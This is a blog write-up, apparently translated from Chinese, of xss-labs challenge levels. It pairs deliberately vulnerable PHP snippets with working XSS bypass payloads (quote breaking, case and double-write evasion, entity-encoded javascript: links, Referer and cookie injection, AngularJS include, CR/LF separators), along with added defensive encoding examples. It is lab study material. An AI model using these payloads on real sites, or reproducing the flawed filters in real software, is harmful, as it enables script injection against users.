沉铝汤's crappy site

IS LIFE ALWAYS THIS HARD, OR IS IT JUST WHEN YOU'RE A KID

xss

htmlspecialchars bypass

  1. With default settings, single quotes are not escaped

    <?php echo "<input name=biubiu value='".htmlspecialchars($str)."'>";?>

    Bypass: ' onclick='alert('xss')

str_replace() bypass

  1.

    <?php
    	$str = strtolower($_GET["keyword"]); // convert everything to lowercase
    	$str1 = str_replace("<script","<scr_pit",$str);
    	$str2 = str_replace("<script","<scr_pit",$str1); // second pass is a no-op: the first already replaced every match
    	//...
    	$str3 = $str2; // further replacements elided in the original
    	echo '<input name=keyword  value="'.$str3.'">';
    ?>

    Bypass: "> <a href="javascript: alert('xss')">hi</a><"

  1. Case bypass

    <?php 
    	$str = strtolower($_GET["keyword"]); // note: this lowercasing normalises the mixed-case payload below; the case bypass relies on it being absent
    	$str2=str_replace("<script","<scr_ipt",$str);
    	$str3=str_replace("on","o_n",$str2);
    	echo '<input name=keyword value="'.$str3.'">';
    ?>

    Bypass: "> <SCRIpt>alert('xss')</ScripT><"

  2. Double-write

    <?php 
    	$str = strtolower($_GET["keyword"]);
    	$str2=str_replace("script","",$str); // each match is removed once; the result is not re-scanned
    	$str3=str_replace("on","",$str2);
    	$str4=str_replace("src","",$str3);
    	$str5=str_replace("data","",$str4);
    	$str6=str_replace("href","",$str5);
    	echo '<input name=keyword value="'.$str6.'">';
    ?>

    Bypass: "><scriscriptpt>alert('xss')</scriscriptpt><"

  3. Encoding bypass

    <?php 
    $str = strtolower($_GET["keyword"]);
    $str2=str_replace("script","scr_ipt",$str);
    $str3=str_replace("on","o_n",$str2);
    $str4=str_replace("src","sr_c",$str3);
    $str5=str_replace("data","da_ta",$str4);
    $str6=str_replace("href","hr_ef",$str5);
    $str7=str_replace('"','&quot',$str6); // missing ';' after &quot is as in the original level
    echo '<input name=keyword  value="'.htmlspecialchars($str).'">';
    ?>
    <?php
     echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';// this time the injection point is here
    ?>

    Bypass: HTML-entity encode javascript:alert('xss') (the encoded payload below decodes to javascript:alert(0)):

    &#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x30;&#x29;
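An added example, not code from the post or from xss-labs: the double-write blacklist above is placed beside a context-aware encoder, and both are run over the payloads from the single-quote and double-write bypasses. blacklist_filter, attr_encode and render_input are assumed names; passing ENT_QUOTES explicitly matters because htmlspecialchars() only started escaping single quotes by default in PHP 8.1.

```php
<?php
// Added example (not from the original post): the page's str_replace blacklist
// beside a context-aware encoder, run over the payloads quoted above.

// The blacklist filter as written in the "double-write" level.
function blacklist_filter(string $s): string {
    $s = strtolower($s);
    foreach (['script', 'on', 'src', 'data', 'href'] as $word) {
        $s = str_replace($word, '', $s);   // single pass: the result is not re-scanned
    }
    return $s;
}

// Encode for a double-quoted HTML attribute. ENT_QUOTES also encodes the single
// quote, which htmlspecialchars() skipped by default before PHP 8.1.
function attr_encode(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Always quote the attribute, then encode: neither ' nor " can close it.
function render_input(string $value): string {
    return '<input name="keyword" value="' . attr_encode($value) . '">';
}

// Constructed inputs: the two payloads quoted in the sections above.
$payloads = [
    'double-write' => '"><scriscriptpt>alert(\'xss\')</scriscriptpt><"',
    'single-quote' => "' onclick='alert('xss')",
];
foreach ($payloads as $name => $p) {
    echo $name, "\n";
    // After removing "script" once, the inner "scri" + "pt" joins back into "script".
    echo "  blacklist : ", blacklist_filter($p), "\n";
    // Every <, >, " and ' is an entity, so the value stays inside the attribute.
    echo "  encoded   : ", render_input($p), "\n";
}
```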

Logic

<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);
echo '<center>
<form action=level9.php method=GET>
<input name=keyword  value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情链接 />
</form>
</center>';
?>
<?php
if(false===strpos($str7,'http://'))
{
  echo '<center><BR><a href="您的链接不合法?有没有!">友情链接</a></center>';
}
else
{
  echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';//ko ko da yo
}
?>

Bypass: the check only looks for the substring http://, so it can be satisfied with a comment /* http:// */. Payload: &#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x30;&#x29 /*http://*/;
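An added example, not code from the post or from xss-labs, covering the encoding bypass and the logic level above: the strpos('http://') substring test is replaced by a real URL check with a scheme allowlist, and the value finally written into href is attribute-encoded. safe_link_href and render_link are assumed names.

```php
<?php
// Added example (not from the original post): the level's strpos('http://')
// test replaced by a URL check with a scheme allowlist, plus attribute
// encoding of the value that is finally written into href. Names are assumed.

function safe_link_href(string $url): ?string {
    // Reject anything that is not a syntactically valid absolute URL.
    // A value that starts with "&#x6a;..." has no scheme at all and fails here.
    if (filter_var($url, FILTER_VALIDATE_URL) === false) {
        return null;
    }
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    if (!in_array($scheme, ['http', 'https'], true)) {
        return null;   // javascript:, data:, vbscript: never reach the page
    }
    // Entity-encode for the attribute context so a quote in the URL cannot close href.
    return htmlspecialchars($url, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function render_link(string $url): string {
    $href = safe_link_href($url);
    if ($href === null) {
        return '<a href="#">invalid link</a>';   // never echo the rejected value back raw
    }
    return '<a href="' . $href . '">link</a>';
}

// Constructed inputs: one legitimate link and the two bypass payloads quoted above.
$inputs = [
    'https://example.com/friends?a=1&b=2',
    'javascript:alert(0) /*http://*/',
    '&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x30;&#x29; /*http://*/',
];
foreach ($inputs as $in) {
    // The first input passes both checks; the second is stopped by the scheme
    // allowlist, the third has no scheme and is stopped by filter_var().
    echo render_link($in), "\n";
}
```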

Changing the input type (whispering: I have no idea what this is for)

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str11 = $_GET["t_sort"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>

payload: keyword = test&t_sort="type="text" onclick = "alert(1)

Capture the request

  1. Plain

    <?php 
    ini_set("display_errors", 0);
    $str = $_GET["keyword"];
    $str00 = $_GET["t_sort"];
    $str11=$_SERVER['HTTP_REFERER'];
    $str22=str_replace(">","",$str11);
    $str33=str_replace("<","",$str22);
    echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
    <form id=search>
    <input name="t_link"  value="'.'" type="hidden">
    <input name="t_history"  value="'.'" type="hidden">
    <input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
    <input name="t_ref"  value="'.$str33.'" type="hidden">
    </form>
    </center>';
    ?>

    Capture the request and then craft the Referer header

    payload: referer: "type="text" onclick="alert(0)

  2. Cookie

    <?php 
    setcookie("user", "call me maybe?", time()+3600);
    ini_set("display_errors", 0);
    $str = $_GET["keyword"];
    $str00 = $_GET["t_sort"];
    $str11=$_COOKIE["user"];
    $str22=str_replace(">","",$str11);
    $str33=str_replace("<","",$str22);
    echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
    <form id=search>
    <input name="t_link"  value="'.'" type="hidden">
    <input name="t_history"  value="'.'" type="hidden">
    <input name="t_sort"  value="'.htmlspecialchars($str00).'" type="hidden">
    <input name="t_cook"  value="'.$str33.'" type="hidden">
    </form>
    </center>';
    ?>

    payload: user=" type="text" onmouseover="alert('xss') (mind the format)

EXIF

EXIF: stores information about when the photo was taken, including focal length, the device, and even the GPS position

Code can be planted in the image's metadata to perform XSS

AngularJS XSS

ng-include: file inclusion

Level 15 of the XSS challenge:

<html ng-app>
<head>
        <meta charset="utf-8">
        <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.2.0/angular.min.js"></script>
<script>
window.alert = function()
{
    confirm("完成的不错!");
    window.location.href="level16.php?keyword=test";
}
</script>
<title>欢迎来到level15</title>
</head>
<h1 align=center>欢迎来到第15关,自己想个办法走出去吧!</h1>
<p align=center><img src=level15.png></p>
<?php 
ini_set("display_errors", 0);
$str = $_GET["src"];
echo '<body><span class="ng-include:'.htmlspecialchars($str).'"></span></body>';
?>

I read a lot of other people's writeups online; they are all cast from the same mold, and I did not fully understand them either, so I'll leave it at that for now

payload:src='level1.php?name=<img src=x onerror=alert(0)>'

Use %0d or %0a as the separator

<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","&nbsp;",$str);
$str3=str_replace(" ","&nbsp;",$str2);
$str4=str_replace("/","&nbsp;",$str3);
$str5=str_replace("	","&nbsp;",$str4); // the needle is a literal tab character
echo "<center>".$str5."</center>";
?>

payload:<img%0dsrc=x%0aonerror=alert(0)>
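An added example, not code from the post or from xss-labs: the three-separator filter above is placed beside a detector that treats every HTML whitespace character as an attribute separator, and beside the output encoding that makes the separator question irrelevant. level_filter, looks_like_event_handler_tag and safe_echo are assumed names.

```php
<?php
// Added example (not from the original post): the level's three-separator filter
// beside a detector that treats every HTML whitespace character as an attribute
// separator, and the output encoding that makes the separator irrelevant.
// level_filter, looks_like_event_handler_tag and safe_echo are assumed names.

function level_filter(string $s): string {
    $s = strtolower($s);
    foreach (['script', ' ', '/', "\t"] as $needle) {   // CR and LF are not on the list
        $s = str_replace($needle, '&nbsp;', $s);
    }
    return $s;
}

// HTML parsers accept tab, LF, FF, CR and space between a tag name and its attributes.
// Match "<tag<ws>...on<event><ws>=" with any of the five as the separator.
function looks_like_event_handler_tag(string $s): bool {
    return (bool) preg_match('/<[a-z][a-z0-9]*[\t\n\f\r ]+[^>]*?\bon[a-z]+[\t\n\f\r ]*=/i', $s);
}

// Encoding '<' and '>' means no tag forms at all, whatever the separator.
function safe_echo(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Constructed input: the %0d / %0a payload above, URL-decoded.
$payload = "<img\rsrc=x\nonerror=alert(0)>";

// The filter passes it through untouched: CR and LF are not replaced, so the tag still forms.
$filtered = level_filter($payload);
echo "CR/LF payload, filter left a handler tag: ", looks_like_event_handler_tag($filtered) ? "yes" : "no", "\n";

// The same payload with ordinary spaces is the case the filter was written for:
// the spaces become &nbsp; text and the tag name no longer ends, so no handler tag is left.
$spaced = level_filter("<img src=x onerror=alert(0)>");
echo "space payload, filter left a handler tag: ", looks_like_event_handler_tag($spaced) ? "yes" : "no", "\n";

// Encoding covers both cases: the browser sees text, not markup.
echo safe_echo($payload), "\n";
```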

Flash XSS

Sob, this one seems a bit hard, and Flash, you're nearly dead anyway

Found a good site: https://www.ctolib.com/docs/sfile/xss-naxienian/1.html